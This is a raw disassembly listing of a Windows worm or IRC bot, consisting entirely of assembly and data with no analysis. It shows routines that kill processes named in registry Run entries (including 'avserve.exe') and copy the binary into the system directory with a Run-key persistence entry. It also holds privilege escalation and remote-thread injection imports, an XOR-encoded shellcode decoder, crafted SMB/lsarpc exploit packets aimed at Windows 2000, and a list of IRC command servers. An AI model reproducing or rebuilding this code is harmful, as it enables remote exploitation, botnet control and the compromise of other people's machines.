cmp esi, 100007Fh
jz short loc_313032FF
push esi
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
loc_313032FF: ; CODE XREF: sub_31303256+9A�j
; sub_31303256+B7�j
push esi
push offset sub_31303112
call sub_31302AC4
pop ecx
dec edi
pop ecx
jnz short loc_313032FF
test ebx, ebx
pop edi
jle short loc_31303327
mov esi, ebx
loc_31303316: ; CODE XREF: sub_31303256+CF�j
push 0
push offset sub_31303196
call sub_31302AC4
pop ecx
dec esi
pop ecx
jnz short loc_31303316
loc_31303327: ; CODE XREF: sub_31303256+BC�j
push 0FFFFFFFFh
call dword_313010D0 ; Sleep
pop esi
xor eax, eax
pop ebx
leave
retn
sub_31303256 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303335 proc near ; CODE XREF: sub_313034CE+85�p
; sub_31303641+B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3130100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31303368
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31301010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31301014 ; RegCloseKey
loc_31303368: ; CODE XREF: sub_31303335+1C�j
pop ebp
retn
sub_31303335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130336A proc near ; CODE XREF: sub_31302C49+33�p
; sub_313034CE+76�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3130100C ; RegOpenKeyExA
test eax, eax
jz short loc_31303396
push 1
pop eax
jmp short loc_313033C0
; ---------------------------------------------------------------------------
loc_31303396: ; CODE XREF: sub_3130336A+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31301008 ; RegQueryValueExA
test eax, eax
jz short loc_313033B5
push 2
pop esi
loc_313033B5: ; CODE XREF: sub_3130336A+46�j
push [ebp+arg_10]
call dword_31301014 ; RegCloseKey
mov eax, esi
loc_313033C0: ; CODE XREF: sub_3130336A+2A�j
pop esi
leave
retn
sub_3130336A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313033C3 proc near ; CODE XREF: sub_31303575+96�p
; sub_31303641+60�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31301000 ; RegCreateKeyExA
test eax, eax
jz short loc_313033EC
push 1
pop eax
jmp short loc_31303413
; ---------------------------------------------------------------------------
loc_313033EC: ; CODE XREF: sub_313033C3+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31301004 ; RegSetValueExA
test eax, eax
jz short loc_31303408
push 2
pop esi
loc_31303408: ; CODE XREF: sub_313033C3+40�j
push [ebp+arg_4]
call dword_31301014 ; RegCloseKey
mov eax, esi
loc_31303413: ; CODE XREF: sub_313033C3+27�j
pop esi
pop ebp
retn
sub_313033C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303416 proc near ; CODE XREF: sub_313034CE+91�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_313010CC ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_313034CA
loc_31303436: ; CODE XREF: sub_31303416+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_3130343F
dec esi
jns short loc_31303436
loc_3130343F: ; CODE XREF: sub_31303416+24�j
push 0
push 2
call sub_313037AE ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_313034CA
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31303744 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_313037A8 ; Process32First
test eax, eax
jz short loc_313034CA
lea esi, [esi+ebx+1]
loc_31303487: ; CODE XREF: sub_31303416+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313034B7
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_313010E4 ; OpenProcess
push 0
push eax
call dword_31301060 ; TerminateProcess
loc_313034B7: ; CODE XREF: sub_31303416+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_313037A2 ; Process32Next
test eax, eax
jnz short loc_31303487
loc_313034CA: ; CODE XREF: sub_31303416+1A�j
; sub_31303416+38�j ...
pop esi
pop ebx
leave
retn
sub_31303416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313034CE proc near ; CODE XREF: UPX0:31302E00�p
var_134 = byte ptr -134h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
mov [ebp+var_2C], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_28], offset aSystemServiceM ; "System Service Manager"
mov [ebp+var_24], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_20], offset aBotLoader ; "Bot Loader"
mov [ebp+var_1C], offset aSystray ; "SysTray"
mov [ebp+var_18], offset aWinupdate ; "WinUpdate"
mov [ebp+var_14], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_10], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_C], offset aAvserve2_exe ; "avserve2.exe"
mov [ebp+var_4], eax
mov [ebp+var_8], 9
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31303530: ; CODE XREF: sub_313034CE+A0�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_134]
push eax
push ebx
push edi
push esi
call sub_3130336A
add esp, 14h
test eax, eax
jnz short loc_31303567
push ebx
push edi
push esi
call sub_31303335
lea eax, [ebp+var_134]
push eax
call sub_31303416
add esp, 10h
loc_31303567: ; CODE XREF: sub_313034CE+80�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31303530
pop edi
pop esi
pop ebx
leave
retn
sub_313034CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303575 proc near ; CODE XREF: sub_31303641+6A�p
; sub_31303641+CA�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3130358A
push [ebp+arg_0]
call dword_3130106C ; DeleteFileA
loc_3130358A: ; CODE XREF: sub_31303575+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_313010B4 ; GetSystemDirectoryA
test eax, eax
jz locret_3130363F
push esi
call dword_31301120 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31302AE5
mov esi, dword_313010EC
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset asc_31304DDC ; "\\"
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31301050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_313010CC ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aUpdateService ; "Update Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_313033C3
add esp, 14h
push dword_31304FD0
call dword_313010A0 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31301054 ; WinExec
push 1F4h
call dword_313010D0 ; Sleep
push 0
call dword_31301070 ; ExitProcess
pop esi
locret_3130363F: ; CODE XREF: sub_31303575+23�j
leave
retn
sub_31303575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303641 proc near ; CODE XREF: UPX0:31302E05�p
var_DC = byte ptr -0DCh
var_78 = byte ptr -78h
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
push edi
lea eax, [ebp+var_78]
push 63h
xor edi, edi
push eax
push edi
call dword_31301048 ; GetModuleFileNameA
test eax, eax
jz loc_31303712
lea eax, [ebp+var_DC]
push 63h
push eax
push offset aUpdateService ; "Update Service"
mov esi, 80000002h
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
mov ds:dword_31305008, edi
call sub_3130336A
add esp, 14h
test eax, eax
jz short loc_313036B5
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push esi
call sub_313033C3
lea eax, [ebp+var_78]
push eax
push edi
call sub_31303575
add esp, 1Ch
jmp short loc_31303712
; ---------------------------------------------------------------------------
loc_313036B5: ; CODE XREF: sub_31303641+4C�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call dword_3130104C ; lstrcmpi
test eax, eax
jnz short loc_31303700
lea eax, [ebp+var_14]
push 14h
mov ebx, offset aClient ; "Client"
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push ebx
push edi
push esi
call sub_3130336A
add esp, 14h
test eax, eax
jnz short loc_31303712
push ebx
push edi
push esi
mov ds:dword_31305008, 1
call sub_31303335
add esp, 0Ch
jmp short loc_31303712
; ---------------------------------------------------------------------------
loc_31303700: ; CODE XREF: sub_31303641+87�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call sub_31303575
pop ecx
pop ecx
loc_31303712: ; CODE XREF: sub_31303641+1D�j
; sub_31303641+72�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31303641 endp
; =============== S U B R O U T I N E =======================================
sub_31303717 proc near ; CODE XREF: sub_31301228+2A�p
; sub_313014C6+27�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31301044 ; VirtualAlloc
retn
sub_31303717 endp
; =============== S U B R O U T I N E =======================================
sub_3130372B proc near ; CODE XREF: sub_31301228+EB�p
; sub_313014C6+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31301040 ; VirtualFree
retn
sub_3130372B endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130373E proc near ; CODE XREF: sub_31301228+4B�p
; sub_31301631+93�p ...
jmp dword_3130111C
sub_3130373E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303744 proc near ; CODE XREF: sub_31301562+20�p
; sub_31301631+128�p ...
jmp dword_31301118
sub_31303744 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130374A proc near ; CODE XREF: sub_31301631+9C�p
; sub_31301631+C5�p ...
jmp dword_31301114
sub_3130374A endp
; =============== S U B R O U T I N E =======================================
sub_31303750 proc near ; CODE XREF: sub_31301631+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31303770
loc_3130375C: ; CODE XREF: sub_31303750+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_3130375C
loc_31303770: ; CODE XREF: sub_31303750+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31303750 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_313037B4
loc_31303780: ; CODE XREF: sub_313037B4+5�j
; UPX0:313037D0�j
jmp dword ptr locret_31301106+2
; END OF FUNCTION CHUNK FOR sub_313037B4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303790 proc near ; CODE XREF: sub_31302260+5�p
; UPX0:31302437�p
jmp dword ptr loc_31301104
sub_31303790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303796 proc near ; CODE XREF: sub_31302F59+10C�p
; sub_31302F59+119�p ...
jmp dword_313010F8
sub_31303796 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130379C proc near ; CODE XREF: sub_31302F59+35�p
jmp dword_313010F4
sub_3130379C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037A2 proc near ; CODE XREF: sub_31303416+AB�p
jmp dword_31301064
sub_313037A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037A8 proc near ; CODE XREF: sub_31303416+64�p
jmp dword_3130105C
sub_313037A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037AE proc near ; CODE XREF: sub_31303416+2D�p
jmp dword_31301058
sub_313037AE endp
; =============== S U B R O U T I N E =======================================
sub_313037B4 proc near ; DATA XREF: sub_31302260�o
; FUNCTION CHUNK AT 31303780 SIZE 00000006 BYTES
mov eax, offset dword_313037D8
jmp loc_31303780
sub_313037B4 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1F0h]
jmp loc_31301E48
; ---------------------------------------------------------------------------
loc_313037CB: ; DATA XREF: UPX0:loc_31302432�o
mov eax, offset dword_31303830
jmp loc_31303780
; ---------------------------------------------------------------------------
align 4
dword_313037D8 dd 19930520h, 2, 313037F8h, 1, 31303808h, 3 dup(0)
; DATA XREF: sub_313037B4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31303820h, 4 dup(0)
dd offset loc_31302343
dword_31303830 dd 19930520h, 1, 31303850h, 5 dup(0) ; DATA XREF: UPX0:loc_313037CB�o
dd 0FFFFFFFFh, 313037C0h, 1EAh dup(0)
dword_31304000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_313011B9+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_313011A0+3�o
align 10h
loc_31304120: ; DATA XREF: sub_31301631+24E�o
; sub_31301631+260�o ...
jmp short loc_31304149
; ---------------------------------------------------------------------------
loc_31304122: ; DATA XREF: sub_31303256+6B�o
adc dh, [esi]
loc_31304124: ; DATA XREF: sub_31303256+87�o
aad 0AAh
stosb
stosd
loc_31304128: ; CODE XREF: UPX0:loc_31304149�p
pop ebp
xor ecx, ecx
mov cx, 225h
lea esi, [ebp+5]
mov edi, esi
loc_31304134: ; CODE XREF: UPX0:31304145�j
mov al, [esi]
cmp al, 99h
jnz short loc_3130413F
inc esi
mov al, [esi]
sub al, 30h
loc_3130413F: ; CODE XREF: UPX0:31304138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_31304134
jmp short near ptr loc_31304152+1
; ---------------------------------------------------------------------------
loc_31304149: ; CODE XREF: UPX0:loc_31304120�j
call loc_31304128
bound esp, cs:[ebp+67h]
loc_31304152: ; CODE XREF: UPX0:31304147�j
db 2Eh
jno short near ptr dword_31304000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F68E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D271C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AF71h, 0F3C999C9h
dd 1065E368h, 99981D1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981D2Ch
dd 71C999C9h, 99C9996Fh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6571C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E5h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Dh, 2E71C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1D2C669Bh, 99C99998h, 993C71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0F60414D9h, 99C99998h, 2971CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F2h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E52C66h, 0C999C999h, 98F22C66h, 0C999C999h
dd 0C9991171h, 0C999C999h, 96A6485Ah, 0F22C66C0h, 99C99998h
dd 99E171C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998F604h
dd 0CAC999C9h, 0C999FF71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C2h, 0F9C999C9h, 0ECEF133Bh, 99C999A0h, 99C999C9h
dd 0B7C999C9h, 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 1E662A2Dh, 0E7E6ACC9h, 9CC9A5B7h, 829DB8BDh
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98191C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_313043FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31301631+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31304488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_31304534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31304614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31301631+BF�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_31304678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_313046E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31304788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_31304808 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31301631+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_3130489C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31304908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_3130497C dd 0 ; DATA XREF: sub_31301631+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_31304A40 dd 1004600h ; DATA XREF: sub_31301631+289�r
dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_31304A7C dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Bh dup(0)
; DATA XREF: sub_31301631+41B�o
; sub_31301631+45D�o
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_31304AF8: ; DATA XREF: sub_31301631+44A�o
jmp short loc_31304B00
; ---------------------------------------------------------------------------
jmp short loc_31304B02
; ---------------------------------------------------------------------------
align 10h
loc_31304B00: ; CODE XREF: UPX0:loc_31304AF8�j
; DATA XREF: sub_31301631+5C�o
pop esp
pop esp
loc_31304B02: ; CODE XREF: UPX0:31304AFA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31304B0C dd 1CEC8166h ; DATA XREF: sub_31301631+D�r
dword_31304B10 dd 0E4FF07h ; DATA XREF: sub_31301631+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31301B98+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31301B98+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31301B98+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31301B98+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31301B98+8�o
align 4
aUterm_9 db 'uterm_9',0 ; DATA XREF: sub_31301C20:loc_31301D05�o
; UPX0:31302DD6�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31301C20+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31301C20:loc_31301C67�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31301C20+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31301C20+18�o
align 10h
off_31304BC0 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:313024FA�r
; UPX0:3130254D�r
; "moscow-advokat.ru"
dd offset aGazProm_ru ; "gaz-prom.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_31304BF4
dword_31304BF4 dd 2E637269h, 2E72616Bh, 74656Eh ; DATA XREF: UPX0:31304BF0�o
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31304BEC�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31304BE8�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:31304BE4�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31304BE0�o
align 10h
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31304BDC�o
align 10h
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31304BD8�o
align 10h
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31304BD4�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31304BD0�o
